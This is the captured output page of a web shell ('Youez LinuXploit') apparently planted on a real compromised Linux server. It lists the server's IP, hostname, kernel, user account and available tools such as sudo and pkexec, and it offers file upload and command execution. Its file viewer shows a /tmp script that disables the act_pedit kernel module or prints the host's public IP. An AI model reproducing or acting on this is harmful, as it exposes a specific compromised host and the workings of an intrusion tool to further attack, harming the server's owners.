403Webshell
Server IP : 159.253.20.91  /  Your IP : 216.73.216.111
Web Server : nginx/1.20.2
System : Linux se38c9e53.fastvps-server.com 5.10.0-13-amd64 #1 SMP Debian 5.10.106-1 (2022-03-17) x86_64
User : pr11_ru_usr ( 1041)
PHP Version : 8.1.29
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /proc/1971815/root/tmp/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/1971815/root/tmp/paralel_sctipt.sh
#!/bin/bash

MODULES="act_pedit"
USED_MODULES=()

for mod in $MODULES; do
    lsmod 2>/dev/null | awk 'NR>1 {print $1, $3}' | grep -q "^${mod} [^0]" && USED_MODULES+=("$mod")
done

if [ ${#USED_MODULES[@]} -eq 0 ]; then
    sh -c "printf 'install act_pedit /bin/false\n' > /etc/modprobe.d/disable-act_pedit.conf; rmmod act_pedit 2>/dev/null; true"
else
    ip -4 -o addr show scope global | awk '
        /inet / {
            split($4, a, "/")
            ip = a[1]
            if (ip !~ /^(10\.|172\.(1[6-9]|2[0-9]|3[01])\.|192\.168\.)/) {
                print ip; exit
            }
        }'
fi

Youez - 2016 - github.com/yon3zu
LinuXploit